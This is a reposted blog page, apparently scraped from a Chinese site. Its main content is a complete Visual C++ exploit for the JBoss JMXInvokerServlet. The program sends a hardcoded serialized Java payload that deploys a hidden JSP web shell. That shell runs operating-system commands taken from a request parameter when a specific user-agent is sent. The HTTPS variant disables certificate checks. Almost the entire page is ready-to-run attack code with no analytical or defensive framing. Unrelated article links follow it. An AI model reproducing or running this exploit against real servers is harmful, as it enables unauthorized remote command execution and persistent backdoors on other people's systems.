zoukankan      html  css  js  c++  java
  • Jboss remote getshell (JMXInvokerServlet) vc版

    #include "stdafx.h"
    #include <Windows.h>
    #include <stdio.h>
    #include <winhttp.h>
    #include <comdef.h>
    #pragma comment (lib,"Winhttp.lib")
    
    char shell_invoke[] = ( 
        "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73" ///shellinvoker/shellinvoker.jsp
        "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72"
        "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f"
        "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77"
        "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76"
        "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2"
        "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75"
        "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e"
        "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00"
        "x78x70xe3x2cx60xe6x73x72x00x24x6fx72x67x2ex6ax62"
        "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d"
        "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc"
        "xe0xd1xf4x4axd0x99x0cx00x00x78x70x7ax00x00x02xc6"
        "x00x00x02xbexacxedx00x05x75x72x00x13x5bx4cx6ax61"
        "x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90"
        "xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x04"
        "x73x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65"
        "x6dx65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0f"
        "x03xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x2cx6a"
        "x62x6fx73x73x2ex61x64x6dx69x6ex3ax73x65x72x76x69"
        "x63x65x3dx44x65x70x6cx6fx79x6dx65x6ex74x46x69x6c"
        "x65x52x65x70x6fx73x69x74x6fx72x79x78x74x00x05x73"
        "x74x6fx72x65x75x71x00x7ex00x00x00x00x00x05x74x00"
        "x10x73x68x65x6cx6cx69x6ex76x6fx6bx65x72x2ex77x61"
        "x72x74x00x0cx73x68x65x6cx6cx69x6ex76x6fx6bx65x72"
        "x74x00x04x2ex6ax73x70x74x01x79x3cx25x40x20x70x61"
        "x67x65x20x69x6dx70x6fx72x74x3dx22x6ax61x76x61x2e"
        "x75x74x69x6cx2ex2ax2cx6ax61x76x61x2ex69x6fx2ex2a"
        "x22x25x3ex3cx70x72x65x3ex3cx25x69x66x28x72x65x71"
        "x75x65x73x74x2ex67x65x74x50x61x72x61x6dx65x74x65"
        "x72x28x22x70x70x70x22x29x20x21x3dx20x6ex75x6cx6c"
        "x20x26x26x20x72x65x71x75x65x73x74x2ex67x65x74x48"
        "x65x61x64x65x72x28x22x75x73x65x72x2dx61x67x65x6e"
        "x74x22x29x2ex65x71x75x61x6cx73x28x22x6ax65x78x62"
        "x6fx73x73x22x29x20x29x20x7bx20x50x72x6fx63x65x73"
        "x73x20x70x20x3dx20x52x75x6ex74x69x6dx65x2ex67x65"
        "x74x52x75x6ex74x69x6dx65x28x29x2ex65x78x65x63x28"
        "x72x65x71x75x65x73x74x2ex67x65x74x50x61x72x61x6d"
        "x65x74x65x72x28x22x70x70x70x22x29x29x3bx20x44x61"
        "x74x61x49x6ex70x75x74x53x74x72x65x61x6dx20x64x69"
        "x73x20x3dx20x6ex65x77x20x44x61x74x61x49x6ex70x75"
        "x74x53x74x72x65x61x6dx28x70x2ex67x65x74x49x6ex70"
        "x75x74x53x74x72x65x61x6dx28x29x29x3bx20x53x74x72"
        "x69x6ex67x20x64x69x73x72x20x3dx20x64x69x73x2ex72"
        "x65x61x64x4cx69x6ex65x28x29x3bx20x77x68x69x6cx65"
        "x20x28x20x64x69x73x72x20x21x3dx20x6ex75x6cx6cx20"
        "x29x20x7bx20x6fx75x74x2ex70x72x69x6ex74x6cx6ex28"
        "x64x69x73x72x29x3bx20x64x69x73x72x20x3dx20x64x69"
        "x73x2ex72x65x61x64x4cx69x6ex65x28x29x3bx20x7dx20"
        "x7dx25x3ex73x72x00x11x6ax61x76x61x2ex6cx61x6ex67"
        "x2ex42x6fx6fx6cx65x61x6excdx20x72x80xd5x9cxfaxee"
        "x02x00x01x5ax00x05x76x61x6cx75x65x78x70x01x75x72"
        "x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74"
        "x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00"
        "x78x70x00x00x00x05x74x00x10x6ax61x76x61x2ex6cx61"
        "x6ex67x2ex53x74x72x69x6ex67x71x00x7ex00x0fx71x00"
        "x7ex00x0fx71x00x7ex00x0fx74x00x07x62x6fx6fx6cx65"
        "x61x6ex63x79xb8x87x78x77x08x00x00x00x00x00x00x00"
        "x01x73x72x00x22x6fx72x67x2ex6ax62x6fx73x73x2ex69"
        "x6ex76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61"
        "x74x69x6fx6ex4bx65x79xb8xfbx72x84xd7x93x85xf9x02"
        "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00"
        "x00x04x70x78");
    
    void request_https(wchar_t* Host,int port)
    {
        DWORD dwSize = 0;
        DWORD dwDownloaded = 0;
        LPSTR pszOutBuffer;
        BOOL bResults = FALSE;
        HINTERNET hSession = NULL,
            hConnect = NULL,
            hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen( L"WinHTTP Example/1.0",
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME,
            WINHTTP_NO_PROXY_BYPASS, 0);
    
        // Specify an HTTP server.
        if (hSession)
            hConnect = WinHttpConnect( hSession,Host,
            port, 0);
    
        // Create an HTTP request handle.
        if (hConnect)
            hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
            NULL, WINHTTP_NO_REFERER,
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            WINHTTP_FLAG_SECURE);
    
        DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
            SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
            SECURITY_FLAG_IGNORE_UNKNOWN_CA ;
    
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpAddRequestHeaders( hRequest, 
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
            (LPVOID)&options, sizeof (DWORD) );
    
        if(bResults == FALSE){
            printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld
    ",GetLastError());
        }
    
        // Send a request.
        if (hRequest){
            bResults = WinHttpSendRequest( hRequest,
                WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                shell_invoke, WORD(sizeof(shell_invoke)),
                sizeof(shell_invoke), 0);
            if(bResults == FALSE)
                printf ("WinHttpSendRequest error: %ld
    ",GetLastError());
        }
    
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
    }
    
    
    void request_http(wchar_t* Host, int Port)
    {
        DWORD dwSize = sizeof(DWORD);
        DWORD dwStatusCode = 0;
        BOOL  bResults = FALSE;
        HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36", 
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME, 
            WINHTTP_NO_PROXY_BYPASS,
            0 );
    
        // Specify an HTTP server.
        if( hSession )
            hConnect = WinHttpConnect( hSession,
            Host,
            Port,
            0 );
    
        // Create an HTTP Request handle.
        if( hConnect )
            hRequest = WinHttpOpenRequest( hConnect,
            L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
            NULL,
            WINHTTP_NO_REFERER, 
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            0 );
        // Add a request header.
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
            bResults = WinHttpAddRequestHeaders( hRequest, 
                L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
        // Send a Request.
        if( bResults ) 
            bResults = WinHttpSendRequest( hRequest, 
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0,
            shell_invoke,WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke),
            0 );
    
        // Report any errors.
        if( !bResults )
            printf( "Error %d has occurred.
    ", GetLastError( ) );
    
        // Close open handles.
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
        //return 0;
    }
    
    int main(int argc, char* argv[])
    {
    
        if (argc < 4)
        {
            printf("[*]:%s Jboss Exploit remote getshell
    ",argv[0]);
            printf("[*]:%s Remote_Host Remote_ip http/https 
    ",argv[0]);
            printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp
    ");
            return -1;
        }
        wchar_t Host[MAX_PATH] = {0};
        wchar_t procotol[MAX_PATH] = {0};
        wsprintfW(Host, L"%S", argv[1]);
        wsprintfW(procotol,L"%S",argv[3]);
        printf("
    [*]:Host:%S procotol:%S 
    ", Host,procotol);
    
        if (0 == lstrcmpi(procotol, L"http"))
        {
            request_http(Host,atoi(argv[2]));
    
        }else if(0 == lstrcmpi(procotol, L"https"))
        {
            request_https(Host,atoi(argv[2]));
        }else
        {
            printf("
    Unknown option.
    ");
            return 0;
        }
        return 0;
    }

  • 相关阅读:
    数据可视化之powerBI技巧(三)这个Power BI技巧很可爱:利用DAX制作时钟
    数据可视化之powerBI技巧(二)Power BI性能分析器,原来还有这个功能
    数据可视化之powerBI技巧(一)PowerBI可视化技巧:KPI指标动态展示之TOPN及其他
    李航统计学习方法(第二版)(十二):最大熵模型
    李航统计学习方法(第二版)(十一):逻辑斯谛回归
    李航统计学习方法(第二版)(十):决策树CART算法
    李航统计学习方法(第二版)(九):决策树简介
    Java 实例 – 在指定目录中查找文件
    input type=”reset” (Elements) – HTML 中文开发手册
    HTML data-, 属性
  • 原文地址:https://www.cnblogs.com/killbit/p/4489664.html
Copyright © 2011-2022 走看看